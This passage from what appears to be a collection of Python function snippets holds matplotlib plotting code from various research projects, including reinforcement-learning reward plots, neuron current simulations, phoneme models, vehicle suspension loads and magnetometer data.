population_rewards = []\n for path in pivector_paths:\n data = np.load(path)\n population_tsnes.append(data[\"tsne\"])\n population_rewards.append(data[\"average_episodic_reward\"])\n data.close()\n tsnes.append(population_tsnes)\n rewards.append(population_rewards)\n tsnes = np.concatenate(tsnes, axis=0)\n rewards = np.concatenate(rewards, axis=0)\n\n # Min-max normalization\n rewards = (rewards - reward_scale[0]) / (reward_scale[1] - reward_scale[0])\n\n scatter = ax.scatter(\n tsnes[:, 0],\n tsnes[:, 1],\n c=rewards,\n cmap=\"plasma\",\n s=1,\n vmin=0,\n vmax=1\n )\n\n ax.text(0.98, 0.98, algo_pretty_name, horizontalalignment=\"right\", verticalalignment=\"top\", transform=ax.transAxes)\n ax.set_xticks([])\n ax.set_yticks([])\n # Hide spines, the outer edges\n ax.spines[\"top\"].set_alpha(0.2)\n ax.spines[\"bottom\"].set_alpha(0.2)\n ax.spines[\"left\"].set_alpha(0.2)\n ax.spines[\"right\"].set_alpha(0.2)\n # Hide edge spines and bolden mid-spines\n if row_idx == 0:\n ax.spines[\"top\"].set_visible(False)\n else:\n ax.spines[\"bottom\"].set_visible(False)\n if column_idx == 0:\n ax.spines[\"left\"].set_visible(False)\n elif column_idx == 1:\n ax.spines[\"right\"].set_alpha(1.0)\n elif column_idx == 2:\n ax.spines[\"left\"].set_alpha(1.0)\n elif column_idx == 3:\n ax.spines[\"right\"].set_visible(False)\n\n # Add titles\n if row_idx == 0 and (column_idx == 0 or column_idx == 2):\n ax.set_title(env.split(\"-\")[0], x=1.0)\n\n cbaxes = figure.add_axes([0.4, 0.94, 0.2, 0.02])\n cbar = 
figure.colorbar(scatter, orientation=\"horizontal\", cax=cbaxes)\n cbar.set_ticks([0.0, 0.5, 1.0])\n cbar.set_ticklabels([\"Min\", \"Reward\", \"Max\"])\n cbar.ax.xaxis.set_ticks_position('top')\n cbar.ax.xaxis.set_label_position('top')\n cbar.ax.tick_params(labelsize=\"small\", length=0)\n figure.tight_layout()\n figure.savefig(\"figures/tsnes.png\", dpi=200, bbox_inches=\"tight\", pad_inches=0.0)", "def _plot(self, rewards, losses, epsilons):\n plt.figure(figsize=(20,5))\n plt.subplot(131)\n plt.title('Episodic Reward')\n plt.plot(rewards)\n plt.subplot(132)\n plt.title('TD Loss')\n plt.plot(losses)\n plt.subplot(133)\n plt.title('Epsilon')\n plt.plot(epsilons)\n plt.tight_layout()\n plt.show()", "def plot_perturbation(wind=7, mldp=30, pref=\"ca\"):\n pl.clf()\n fig,axes = pl.subplots(3, 1, sharex=True, num=1,figsize=(6,6))\n model_kws = dict(pref=pref, reg=\"pert\",\n temp=None, salt=None, wind=wind, mldp=mldp,\n deepmld1={\"pert\":0, \"tpos\":165},\n deepmld2={\"pert\":0, \"tpos\":553},\n uppwell1={\"pert\":0, \"tpos\":165, \"pdays\":5},\n uppwell2={\"pert\":0, \"tpos\":553, \"pdays\":5})\n md = run_model(**model_kws)\n plot_timeseries(md, axes=axes, alpha=0.5) \n if pref == \"ca\":\n preftxt = \"CCS\"\n model_kws[\"uppwell1\"][\"pert\"] = 82.5\n model_kws[\"uppwell2\"][\"pert\"] = 165\n else:\n preftxt = \"NWA\"\n model_kws[\"deepmld1\"][\"pert\"] = 17\n model_kws[\"deepmld2\"][\"pert\"] = 34\n md = run_model(**model_kws)\n plot_timeseries(md, axes=axes, alpha=1)\n pl.suptitle(\n f\"Perturbations, temp and salt for {preftxt}, wind:{wind}m/s, mld:{mldp}m\")\n pl.savefig(os.path.join(FIGDIR, f\"pertubation_timeseries_{pref}.pdf\"))", "def main_paper(mode = 'q-diff'):\n mode_name = 'Shared Autonomy'\n if mode== 'override':\n mode_name = 'Overrider'\n\n #trains rl again and fills a q-table\n _, rl_agent = rl_alone(1000, fill_table = True)\n\n #prints the q-table\n for y in range(7):\n for x in range(7):\n state_ind = y*(7)+x\n q = rl_agent.get_q_values(state_ind)\n print('Q-table')\n print(state_ind, [x,y], np.around(q, decimals=5))\n\n in_li = []\n r_li = []\n rp_li=[]\n\n print(\"Begin looping through constraint values\")\n for i in np.arange(0.0, 1.025, 0.025):\n #cooperates and gets results\n rewards, actionsct, rewardsP = grid_human_co(coagent=rl_agent, threshold=i, verbose=False, mode=mode)\n print(\"Threshold: \", i)\n avgInter = np.mean(actionsct, axis=0)\n avgR = np.mean(rewards, axis=0)\n avgRP = np.mean(rewardsP, axis=0)\n in_li.append(avgInter)\n r_li.append(avgR)\n rp_li.append(avgRP)\n print('Avg num of interventions: ', avgInter)\n print('Avg reward: ', avgR)\n print('Avg reward penalized: ', avgRP)\n print()\n\n plt.figure()\n plt.plot(np.arange(0.0, 1.025, 0.025), in_li)\n plt.title(mode_name + ' Interventions')\n plt.xlabel(r\"$\\alpha$\")\n plt.ylabel('Average intervention count')\n plt.show()\n\n plt.figure()\n plt.title(mode_name + ' Returns', fontsize=14)\n plt.xlabel(r\"$\\alpha$\", fontsize=13)\n plt.ylabel('Average return', fontsize=13)\n plt.plot(np.arange(0.0, 1.025, 0.025), r_li,label='Average environment return')\n plt.plot(np.arange(0.0, 1.025, 0.025), rp_li,label=\"Average intervention return\")\n plt.legend(fontsize=9)\n plt.show()", "def quick_plot(solution):\n plt.suptitle('GNLSE solution')\n\n plt.subplot(1, 2, 1)\n plot_wavelength_vs_distance(solution)\n\n plt.subplot(1, 2, 2)\n plot_delay_vs_distance(solution)\n\n plt.show()", "def figure2():\n # sim_data_XPP = pd.read_csv(\"XPP.dat\", delimiter=\" \", header=None) # Load the XPP simulation\n\n 
plot_settings = {'y_limits': [-25, 0],\n 'x_limits': None,\n 'y_ticks': [-25, -20, -15, -10, -5, 0],\n 'locator_size': 2.5,\n 'y_label': 'Current (nA)',\n 'x_ticks': [],\n 'scale_size': 0,\n 'x_label': \"\",\n 'scale_loc': 4,\n 'figure_name': 'figure_2',\n 'legend': ['I-Na', 'I-NaP'],\n 'legend_size': 8,\n 'y_on': True}\n\n t, y = solver(100) # Integrate solution\n t_short = np.where((t >= 8) & (t <= 18))[0] # shorter time bounds for plots A and C\n v, m, h, m_nap, h_na_p, n, m_t, h_t, m_p, m_n, h_n, z_sk, m_a, h_a, m_h, ca = y[:, ].T # Extract all variables\n\n \"\"\"\n Explicitly calculate all currents: Extra constants duplicated from function dydt to calculate currents\n \"\"\"\n g_na_bar = 0.7\n g_nap_bar = 0.05\n g_k_bar = 1.3\n g_p_bar = 0.05\n g_leak = 0.005\n g_a_bar = 1.0\n e_na = 60\n e_k = -80\n e_leak = -50\n e_ca = 40\n g_t_bar = 0.1\n g_n_bar = 0.05\n g_sk_bar = 0.3\n\n \"\"\"\n Calculate currents used in the plot\n \"\"\"\n i_na = g_na_bar * (m ** 3) * h * (v - e_na)\n i_na_p = g_nap_bar * m_nap * h_na_p * (v - e_na)\n i_k = g_k_bar * (n ** 4) * (v - e_k)\n i_leak = g_leak * (v - e_leak)\n i_t = g_t_bar * m_t * h_t * (v - e_ca)\n i_n = g_n_bar * m_n * h_n * (v - e_ca)\n i_p = g_p_bar * m_p * (v - e_ca)\n i_sk = g_sk_bar * (z_sk ** 2) * (v - e_k)\n i_a = g_a_bar * m_a * h_a * (v - e_k)\n\n plt.figure(figsize=(5, 3), dpi=96) # Create figure\n\n plt.subplot(2, 2, 1) # Generate subplot 1 (top left)\n plt.plot(t[t_short], i_na[t_short], 'k-')\n plt.plot(t[t_short], i_na_p[t_short], c='k', linestyle='dotted')\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(2, 2, 2) # Generate subplot 2 (top right)\n plt.plot(t, i_t + i_n + i_p, 'k-')\n plt.plot(t, i_t, c='k', linestyle='dotted')\n plt.plot(t, i_p, 'k--')\n plt.plot(t, i_n, 'k-.')\n\n plot_settings['y_limits'] = [-2.5, 0]\n plot_settings['y_ticks'] = [-2.5, -2, -1.5, -1, -0.5, 0]\n plot_settings['locator_size'] = 0.25\n plot_settings['y_label'] = \"\"\n plot_settings['legend'] = ['I-Ca', 'I-T', 'I-P', 'I-N']\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(2, 2, 3) # Generate subplot 3 (bottom left)\n plt.plot(t[t_short], i_k[t_short], 'k-')\n plt.plot(t[t_short], i_a[t_short], c='k', linestyle='dotted')\n plt.plot(t[t_short], i_leak[t_short], 'k-.')\n\n plot_settings['y_limits'] = [0, 25]\n plot_settings['y_ticks'] = [0, 5, 10, 15, 20, 25]\n plot_settings['locator_size'] = 2.5\n plot_settings['y_label'] = \"Current (nA)\"\n plot_settings['legend'] = ['I-K', 'I-A', 'I-leak']\n plot_settings['scale_size'] = 2\n plot_settings['scale_loc'] = 2\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(2, 2, 4) # Generate subplot 4 (bottom left)\n\n plt.plot(t, i_sk, 'k-')\n # plt.plot(sim_data_XPP[0][900:]-200,sim_data_XPP[34][900:]) # Isk for XPP data\n\n plot_settings['y_limits'] = [0, 1]\n plot_settings['y_ticks'] = [0, 0.2, 0.4, 0.6, 0.8, 1]\n plot_settings['locator_size'] = 0.2\n plot_settings['y_label'] = \"\"\n plot_settings['legend'] = ['I-SK']\n plot_settings['scale_size'] = 20\n plot_settings['scale_loc'] = 2\n alter_figure(plot_settings, close=True) # Alter figure for publication", "def reproduce_paper():\n dirname = os.path.join(DATADIR, 'ptn_runs')\n tdatlst_f3 = [multiple_pandas_to_teacher_data(dirname)]\n tdatlst_f2 = [multiple_pandas_to_teacher_data(dirname, remove_f3=True)]\n\n target_f3, labels = ids.gen_model(f3=True)\n target_f2, _ = ids.gen_model(f3=False)\n\n # Phoneme models and samples\n # --------------------------\n 
plt.figure(tight_layout=True, facecolor='white', figsize=(9.5, 6.34,))\n sns.set(rc={'axes.facecolor': '#bbbbbb', 'grid.color': '#aaaaaa'})\n\n plt.subplot2grid((2, 3), (0, 0), rowspan=2, colspan=2)\n plt.title('A')\n ids.plot_phoneme_models(tdatlst_f3[0], target_f3, labels,\n formants=[0, 1], nstd=2,\n legend=True, grayscale=True)\n plt.subplot2grid((2, 3), (0, 2))\n plt.title('B')\n ids.plot_phoneme_models(tdatlst_f3[0], target_f3, labels, formants=[1, 2],\n nstd=2, grayscale=True)\n plt.subplot2grid((2, 3), (1, 2))\n plt.title('C')\n ids.plot_phoneme_models(tdatlst_f3[0], target_f3, labels, formants=[0, 2],\n nstd=2, grayscale=True)\n\n plt.savefig('fig-1.png', dpi=300)\n\n # Articulation\n # ------------\n sns.set(rc={'axes.facecolor': '#e8e8e8', 'grid.color': '#ffffff'})\n f = plt.figure(tight_layout=True, facecolor='white', figsize=(9.5, 4.75,))\n\n ax1 = f.add_subplot(2, 1, 1)\n plt.title('A')\n indices = ids.plot_phoneme_articulation(tdatlst_f3, target_f3, labels,\n ax=ax1)\n ax2 = f.add_subplot(2, 1, 2)\n plt.title('B')\n ids.plot_phoneme_articulation(tdatlst_f2, target_f2, labels, ax=ax2,\n indices=indices)\n ax2.set_ylim(ax1.get_ylim())\n\n plt.savefig('fig-2.png', dpi=300)\n\n # Variation (F1, F2, F3)\n # ---------------------\n plt.figure(tight_layout=True, facecolor='white', figsize=(9.5, 3.5,))\n sns.set(rc={'axes.facecolor': '#e8e8e8'})\n ids.plot_phoneme_variation(tdatlst_f3, target_f3, labels)\n plt.savefig('fig-3.png', dpi=300)\n\n # ARI for different learning algorithms\n ari_file_f3 = os.path.join(DATADIR, 'omnirunf3.pkl')\n ari_file_f2 = os.path.join(DATADIR, '2FLearning_500ex.pkl')\n ari_ylabels = [\"ARI (F1, F2, F3)\", \"ARI (F1, F2)\"]\n sns.set(rc={'axes.facecolor': '#cccccc', 'grid.color': '#bbbbbb'})\n plot_compare([ari_file_f3, ari_file_f2], [500, 500], ari_ylabels,\n grayscale=True)\n plt.savefig('fig-4.png', dpi=300)\n\n # DPGMM ARI as a funciton of the number of samples\n # ------------------------------------------------\n f = plt.figure(tight_layout=True, facecolor='white', figsize=(7.5, 3.5,))\n sns.set(rc={'axes.facecolor': '#eeeeee', 'grid.color': '#d8d8d8'})\n ari_over_time_violin()\n plt.savefig('fig-5.png', dpi=300)", "def figure3():\n\n plot_settings = {'y_limits': [-75, -50],\n 'x_limits': None,\n 'y_ticks': [-75, -70, -65, -60, -55, -50],\n 'locator_size': 2.5,\n 'y_label': 'Voltage (mV)',\n 'x_ticks': [],\n 'scale_size': 2,\n 'x_label': \"\",\n 'scale_loc': 3,\n 'figure_name': 'figure_3',\n 'legend': ['0.1 $\\mu$S', '0.125 $\\mu$S', '0.15 $\\mu$S'],\n 'legend_size': 8,\n 'legend_location': 4,\n 'y_on': True}\n line_styles = ['-', 'dotted', '-.']\n\n plt.figure(figsize=(5, 3))\n plt.subplot(1, 2, 1) # Generate subplot 1 (left)\n for ix, g_t_bar in enumerate([0.1, 0.125, 0.15]):\n t, y = solver(6, g_t_bar=g_t_bar, t_start=0.5)\n plt.plot(t, y[:, 0], c='k', linestyle=line_styles[ix])\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(1, 2, 2) # Generate subplot 2 (right)\n for ix, i_bias_on in enumerate([0, -0.1, -0.2]):\n \"\"\"\n First step (hyperpolarizing)\n \"\"\"\n t1 = 1000\n duration = t1\n\n t, y_hold = solver(t1, duration=duration, i_bias_on=i_bias_on)\n y_0 = y_hold[-1, :] # Create new initial conditions\n\n \"\"\"\n Second step (current pulse)\n \"\"\"\n t1 = 20\n t, y = solver(t1, t_start=0, y_hold=y_0)\n v = y[:, 0]\n\n \"\"\"\n Append the end of the first step onto the second step (for plotting purposes)\n \"\"\"\n len_pre = 100\n t = np.concatenate((np.linspace(-len_pre * np.diff(t)[0], -np.diff(t)[0], 
len_pre), t))\n v_bar = np.concatenate((y_hold[-len_pre:, 0], v))\n v_bar = v_bar - v_bar[0] + -7.16300325e+01 # Align solution to initial condition of the \"standard simulation\"\n\n plt.plot(t, v_bar, c='k', linestyle=line_styles[ix])\n\n plot_settings['y_ticks'] = []\n plot_settings['y_label'] = \"\"\n plot_settings['x_limits'] = [-1, 20]\n plot_settings['legend'] = ['-72 mV', '-75 mV', '-78 mV']\n plot_settings['scale_size'] = 5\n plot_settings['legend_location'] = 1\n alter_figure(plot_settings, close=True)", "def plot_plateau(x,y,p,n,Vdc):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_xlabel('Vrf [V]')\n ax.set_ylabel('Current [nA]')\n fig.suptitle('Vdc = '+str(Vdc)+' n = '+str(n), fontsize=24)\n \n plt.plot(x,y,'x',label='Experimental data') \n t = np.linspace(min(x),max(x),1000)\n plt.plot(t,f(t,p[0],p[1],p[2]),label='Fit')\n plt.axhline(y=n*e*frequency*1e9, color='black', linestyle='-')\n\n ax.legend()\n plt.show(block=True)\n plt.pause(0.3)\n plt.close()\n \n return None", "def wheel_disp_compare_plot(dictionary, a_x, a_y, corner_weights_static, time, data_lf, data_rf, data_lr, data_rr,\n velocity):\n # generate quarter elipse for all four tires\n weight = dictionary['Performance Figures']['Weight'][0]\n trackwidth_f = dictionary['Left Front']['Wheel Center'][1] - dictionary['Right Front']['Wheel Center'][1]\n trackwidth_r = dictionary['Left Front']['Wheel Center'][1] - dictionary['Right Front']['Wheel Center'][1]\n wheel_base = dictionary['Left Front']['Wheel Center'][0] - dictionary['Left Rear']['Wheel Center'][0]\n\n x_load_transfer = load_transfer(a_x, dictionary['Performance Figures']['Weight'][0], wheel_base,\n dictionary['Performance Figures']['Center of Gravity'][2])\n\n y_load_transfer = load_transfer(a_y, dictionary['Performance Figures']['Weight'][0], trackwidth_f,\n dictionary['Performance Figures']['Center of Gravity'][2])\n dynamics_loads = []\n accel_long = []\n accel_lat = []\n for x, y, a1, a2 in zip(x_load_transfer, y_load_transfer, a_x, a_y):\n lf = corner_weights_static[0] + x + y\n rf = corner_weights_static[1] + x - y\n lr = corner_weights_static[2] - x + y\n rr = corner_weights_static[3] - x - y\n # print 'dynamics loads', lf, rf, lr, rr\n dynamics_loads.append(np.array([lf, rf, lr, rr]))\n accel_long.append(np.array([a1, a1, a1, a1]))\n accel_lat.append(np.array([a2, a2, a2, a2]))\n # print dynamics_loads\n lat_tire_force = [load*a for load, a in zip(dynamics_loads, accel_lat)]\n long_tire_force = [load*a for load, a in zip(dynamics_loads, accel_long)]\n damper_displacements = []\n jacking_forces = []\n for ly, lx, v in zip(lat_tire_force, long_tire_force, velocity):\n # print 'lat_f', ly\n # print 'lat_x', lx\n displacements, jacking_f = four_corner_wheel_displacement(dictionary, ly, lx, v)\n damper_displacements.append(np.multiply(displacements, dictionary['Performance Figures']['Motion Ratio'][0:4]))\n jacking_forces.append(jacking_f)\n print jacking_forces\n\n ax = plt.subplot2grid((4, 2), (0, 0), projection='3d')\n ax2 = plt.subplot2grid((4, 2), (0, 1), projection='3d')\n ax3 = plt.subplot2grid((4, 2), (1, 0), projection='3d')\n ax4 = plt.subplot2grid((4, 2), (1, 1), projection='3d')\n ax5 = plt.subplot2grid((4, 2), (2, 0), projection='3d')\n ax6 = plt.subplot2grid((4, 2), (2, 1), projection='3d')\n ax7 = plt.subplot2grid((4, 2), (3, 0), colspan=2)\n\n ax.set_title('Damper Displacements')\n ax2.set_title('Normal Loads')\n ax3.set_title('Longitudinal Forces')\n ax4.set_title('Lateral Forces')\n ax5.set_title('Jacking Lateral')\n 
ax6.set_title('Jacking Longitudinal')\n ax7.set_title('Displacement vs Time')\n\n ax.plot(a_x, a_y, [x[0] for x in damper_displacements], c='r', label='lf')\n ax.plot(a_x, a_y, [x[1] for x in damper_displacements], c='orange', label='rf')\n ax.plot(a_x, a_y, [x[2] for x in damper_displacements], c='g', label='lr')\n ax.plot(a_x, a_y, [x[3] for x in damper_displacements], c='b', label='rr')\n\n ax2.plot(a_x, a_y, [x[0] for x in dynamics_loads], c='r', label='lf')\n ax2.plot(a_x, a_y, [x[1] for x in dynamics_loads], c='orange', label='rf')\n ax2.plot(a_x, a_y, [x[2] for x in dynamics_loads], c='g', label='lr')\n ax2.plot(a_x, a_y, [x[3] for x in dynamics_loads], c='b', label='rr')\n\n ax3.plot(a_x, a_y, [x[0] for x in long_tire_force], c='r', label='lf')\n ax3.plot(a_x, a_y, [x[1] for x in long_tire_force], c='orange', label='rf')\n ax3.plot(a_x, a_y, [x[2] for x in long_tire_force], c='g', label='lr')\n ax3.plot(a_x, a_y, [x[3] for x in long_tire_force], c='b', label='rr')\n\n ax4.plot(a_x, a_y, [x[0] for x in lat_tire_force], c='r', label='lf')\n ax4.plot(a_x, a_y, [x[1] for x in lat_tire_force], c='orange', label='rf')\n ax4.plot(a_x, a_y, [x[2] for x in lat_tire_force], c='g', label='lr')\n ax4.plot(a_x, a_y, [x[3] for x in lat_tire_force], c='b', label='rr')\n\n ax5.plot(a_x, a_y, [x[0] for x in jacking_forces], c='r', label='lf')\n ax5.plot(a_x, a_y, [x[1] for x in jacking_forces], c='orange', label='rf')\n ax5.plot(a_x, a_y, [x[2] for x in jacking_forces], c='g', label='lr')\n ax5.plot(a_x, a_y, [x[3] for x in jacking_forces], c='b', label='rr')\n\n ax6.plot(a_x, a_y, [x[4] for x in jacking_forces], c='r', label='lf')\n ax6.plot(a_x, a_y, [x[5] for x in jacking_forces], c='orange', label='rf')\n ax6.plot(a_x, a_y, [x[6] for x in jacking_forces], c='g', label='lr')\n ax6.plot(a_x, a_y, [x[7] for x in jacking_forces], c='b', label='rr')\n\n ax7.plot(time, [x[0] for x in damper_displacements], c='r', label='lf')\n ax7.plot(time, [x[1] for x in damper_displacements], c='orange', label='rf')\n ax7.plot(time, [x[2] for x in damper_displacements], c='g', label='lr')\n ax7.plot(time, [x[3] for x in damper_displacements], c='b', label='rr')\n ax7.plot(time, data_lf+.28, c='r', label='lf', linestyle=':')\n ax7.plot(time, data_rf+.28, c='orange', label='rf', linestyle=':')\n ax7.plot(time, data_lr+.35, c='g', label='lr', linestyle=':')\n ax7.plot(time, data_rr+.35, c='b', label='rr', linestyle=':')\n\n plt.legend()\n plt.show()\n return lat_tire_force, long_tire_force", "def _plot_arm(self):\n fig, axs = plt.subplots()\n fig.show()\n axs.cla()\n axs.axis([-1, 2.5, -1, 2.5])\n axs.plot([0], [0], 'o')\n config_plots = []\n for t_step in range(0, int(self._t_sim / self._dt) + 1, 1000):\n axs.plot([0, self._x_1[t_step]], [0, self._y_1[t_step]])\n axs.plot(self._x_1[t_step], self._y_1[t_step], 'o')\n axs.plot(\n [self._x_1[t_step], self._x_2[t_step]],\n [self._y_1[t_step], self._y_2[t_step]]\n )\n axs.plot(self._x_2[t_step], self._y_2[t_step], 'o')\n axs.plot(\n [self._x_2[t_step], self._x_e[t_step]],\n [self._y_2[t_step], self._y_e[t_step]]\n )\n axs.plot(self._x_e[t_step], self._y_e[t_step], 'ro')\n axs.plot(\n self._obj_coords_plot[t_step, 0, 0],\n self._obj_coords_plot[t_step, 1, 0], 'g+')\n axs.plot(\n self._obj_coords_plot[t_step, 0, 1],\n self._obj_coords_plot[t_step, 1, 1], 'g.')\n axs.plot(\n self._obj_coords_plot[t_step, 0, 2],\n self._obj_coords_plot[t_step, 1, 2], 'g.')\n axs.plot(\n self._obj_coords_plot[t_step, 0, 3],\n self._obj_coords_plot[t_step, 1, 3], 'g.')\n axs.plot(\n 
self._obj_coords_plot[t_step, 0, 4],\n self._obj_coords_plot[t_step, 1, 4], 'g.')\n plt.axis('off')\n plt.pause(1 / self._plot_fps)\n fig.canvas.draw()\n image = np.frombuffer(fig.canvas.tostring_rgb(), dtype='uint8')\n config_plots.append(image.reshape(\n fig.canvas.get_width_height()[::-1] + (3, )))\n\n # Draw and create image\n return config_plots", "def PCO1S12Noise():\n #Get data\n wdir = '/home/rallured/Dropbox/AXRO/Metrology/' \\\n 'NoiseStudy/TestOptics_PCO1S12/'\n d1,dx1 = met.read4DFits(wdir+'161202_PCO1S12_4InchCut_Avg8_Meas1.fits')\n d2,dx2 = met.read4DFits(wdir+'161202_PCO1S12_4InchCut_Avg8_Meas2.fits')\n d3,dx3 = met.read4DFits(wdir+'161202_PCO1S12_4InchCut_Avg8_Meas3.fits')\n\n #Construct power spectra\n f12,pow12 = fourier.meanPSD((d1-d2)[:,100:-100],\\\n win=np.hanning,dx=dx1,irregular=True)\n f23,pow23 = fourier.meanPSD((d2-d3)[:,100:-100],\\\n win=np.hanning,dx=dx1,irregular=True)\n f13,pow13 = fourier.meanPSD((d1-d3)[:,100:-100],\\\n win=np.hanning,dx=dx1,irregular=True)\n\n #Mid frequency\n midfreq = [1000*np.sqrt(np.sum(p[np.logical_and(f>.1,f<1.)])) \\\n for f,p in zip([f12,f23,f13],[pow12,pow23,pow13])]\n\n #Plot\n plt.loglog(f12,pow12/f12[0],label='1-2: %.2f' % midfreq[0])\n plt.loglog(f23,pow23/f23[0],label='2-3: %.2f' % midfreq[1])\n plt.loglog(f13,pow13/f13[0],label='1-3: %.2f' % midfreq[2])\n plt.legend(loc='lower left')\n plt.grid()\n plt.title('4D Repeatability: PCO1S12')\n plt.xlabel('Frequency (1/mm)')\n plt.ylabel('Power ($\\mu$m$^2$ mm)')\n\n print midfreq\n\n return f12,pow12", "def sac_paper_plot(log_dir, det_policy_sublocation,act_0,act_1,act_2,is_tri,actions_to_plot_large=10,\n actions_to_plot_small = 100,actions_per_log = 6000, custom_colors=None,prot_linewidth=2.7,\n reward_linewidth = None,plot_file_name = None,small_action_ylim=None,large_action_ylim=None,\n reward_ylim=None,reward_ylabel=None, reward_plot_extra_args = None,\n reward_plot_extra_kwargs = None,extra_cycles=None,extra_cycles_linewidth=None,\n reward_legend_labels=None,action_legend_lines=None,action_legend_text=None,\n action_legend_location=None):\n\n #get location of files\n running_reward_file, _, actions_file = \\\n sac_logs_file_location(log_dir, is_tri, None,None,None)\n\n #font size\n matplotlib.rcParams.update({'font.size': 14, \"text.usetex\": True,\n 'text.latex.preamble' : r'\\usepackage{amsmath}\\usepackage{physics}'})\n\n #create the axis (subplots)\n fig = plt.figure(constrained_layout=True, figsize=(6,5))\n gs = gridspec.GridSpec(3, 3, figure=fig, height_ratios = [1,0.7,1])\n reward_ax = fig.add_subplot(gs[0, :])\n prot_0_ax = fig.add_subplot(gs[1, 0])\n prot_1_ax = fig.add_subplot(gs[1, 1],sharey=prot_0_ax)\n prot_2_ax = fig.add_subplot(gs[1, 2],sharey=prot_0_ax)\n prot_final_ax = fig.add_subplot(gs[2, :])\n plt.setp(prot_1_ax.get_yticklabels(), visible=False)\n plt.setp(prot_2_ax.get_yticklabels(), visible=False) \n\n #set the reward axis\n plot_running_reward_on_axis(running_reward_file, reward_ax, plot_to_file_line = None, linewidth=reward_linewidth,\n custom_color = \"black\", lines_to_mark = [nearest_int(act_0/actions_per_log),\n nearest_int(act_1/actions_per_log),nearest_int(act_2/actions_per_log)],\n custom_mark_color=\"black\",ylim=reward_ylim,ylabel=reward_ylabel,\n plot_extra_args=reward_plot_extra_args, plot_extra_kwargs=reward_plot_extra_kwargs,\n legend_labels=reward_legend_labels)\n\n #set the three actions axis\n plot_actions_on_axis(actions_file, prot_0_ax, is_tri=is_tri, actions_to_plot=actions_to_plot_small,\n 
actions_ylim=small_action_ylim,plot_to_file_line=act_0,\n custom_colors=custom_colors,constant_steps=True, linewidth = prot_linewidth,\n two_xticks=True)\n plot_actions_on_axis(actions_file, prot_1_ax, is_tri=is_tri, actions_to_plot=actions_to_plot_small,\n plot_to_file_line=act_1,ylabel=\"\",custom_colors=custom_colors,\n constant_steps=True, linewidth = prot_linewidth,two_xticks=True)\n plot_actions_on_axis(actions_file, prot_2_ax, is_tri=is_tri, actions_to_plot=actions_to_plot_small,\n plot_to_file_line=act_2, ylabel=\"\",custom_colors=custom_colors,\n constant_steps=True, linewidth = prot_linewidth, two_xticks=True)\n\n #set the final protocol axis\n plot_actions_on_axis(log_dir + det_policy_sublocation, prot_final_ax, is_tri, actions_to_plot=actions_to_plot_large,\n actions_ylim=large_action_ylim,plot_to_file_line=None,\n custom_colors=custom_colors, constant_steps=True, k_notation=False, x_count_from_zero=True,\n linewidth = prot_linewidth, xlabel=\"$t[dt]$\",extra_cycles=extra_cycles,\n extra_cycles_linewidth=extra_cycles_linewidth, legend_lines=action_legend_lines,\n legend_text=action_legend_text, legend_location=action_legend_location)\n\n #add the (a) (b) (c) labels\n reward_ax.text(-0.11,-0.38, r'\\textbf{(a)}', transform=reward_ax.transAxes )\n prot_0_ax.text(-0.4,-0.55, r'\\textbf{(b)}', transform=prot_0_ax.transAxes )\n prot_final_ax.text(-0.11,-0.38, r'\\textbf{(c)}', transform=prot_final_ax.transAxes )\n\n #save if necessary\n if plot_file_name is not None:\n plot_folder = os.path.join(log_dir, PLOT_DIR_NAME)\n Path(plot_folder).mkdir(parents=True, exist_ok=True)\n plot_file_name = os.path.join(plot_folder, plot_file_name)\n plt.savefig(plot_file_name)\n\n #show\n plt.show()", "def generatePlot(data):\n addendum = \"\"\n destination = \"D:\\\\Research\\\\scripts\\\\Results\\\\FullSet1\\\\$FilteredPlots\\\\take 4\\\\\"\n if len(data.detections.smallIncrease) != 0:\n addendum = \"small increases\\\\\"\n if len(data.detections.smallDecrease) != 0:\n addendum = \"small decreases\\\\\"\n if len(data.detections.largeIncrease) != 0:\n addendum = \"large increases\\\\\"\n if len(data.detections.largeDecrease) != 0:\n addendum = \"large decreases\\\\\"\n if addendum == \"\":\n addendum = \"no decreases\\\\\"\n \n plt.figure(1)\n plt.subplot(211)\n #print np.min(data.magdata), np.max(data.magdata)\n axes = plt.gca()\n axes.set_title(\"Year: '{year}, Day: {day}\".format(year=data.calendarDay[:2], day=data.calendarDay[3:] ))\n axes.set_ylim([np.min(data.magdata)-1.2,np.max(data.magdata)+0.25])\n axes.set_ylabel(r'$\\mathbf{B}$ (nT)' )\n\n #plot formatting\n formats = dates.DateFormatter('%H:%M:%S')\n axes.xaxis.set_major_locator(dates.MinuteLocator())\n axes.xaxis.set_major_formatter(formats)\n \n br, = pp.plot(dates.date2num(data.timestamps),[row[0] for row in data.magdata],label='$B_r$')\n bt, = pp.plot(dates.date2num(data.timestamps),[row[1] for row in data.magdata],label='$B_t$')\n bn, = pp.plot(dates.date2num(data.timestamps),[row[2] for row in data.magdata],label='$B_n$')\n b0, = pp.plot(dates.date2num(data.timestamps),[row[3] for row in data.magdata],label='$B_0$')\n print len(data.detections.rotationBoundary)\n if len(data.detections.rotationBoundary) == 1:\n rotation, = pp.plot([dates.date2num(data.detections.rotationBoundary), dates.date2num(data.detections.rotationBoundary)], [np.min(data.magdata)-1,np.max(data.magdata)+0.25], linestyle='--', color = 'm', alpha = 0.4, label='$RB$')\n else:\n for index, value in enumerate(data.detections.rotationBoundary):\n rotation, = 
pp.plot([dates.date2num(value), dates.date2num(value)], [np.min(data.magdata)-1,np.max(data.magdata)+0.25], linestyle='--', color = 'm', alpha = 0.4, label='$RB$')\n if len(data.detections.rotationBoundary) != 0:\n pp.legend(handles=[br,bt,bn,b0,rotation], loc='lower left', ncol=4, fancybox=True, framealpha=0.5)\n else:\n pp.legend(handles=[br,bt,bn,b0], loc='lower left', ncol=4, fancybox=True, framealpha=0.5)\n\n start, end = axes.get_xlim()\n axes.xaxis.set_ticks(np.arange(start, end, (end-start)/5))\n \n \n\n plt.subplot(212)\n axes2 = plt.gca()\n #plot formatting\n formats = dates.DateFormatter('%H:%M:%S')\n axes2.xaxis.set_major_locator(dates.MinuteLocator())\n axes2.xaxis.set_major_formatter(formats)\n axes2.set_ylabel(r'$\\theta$ (deg)' )\n rotations, = pp.plot(dates.date2num(data.detections.rotationTimeTags),data.detections.rotations)\n #pp.legend(handles=[rotations], loc='lower left', ncol=4, fancybox=True, framealpha=0.5)\n \n\n outplotname = 'Plot ' + str(len(os.listdir(destination+addendum)) + 1)+ ' ' + 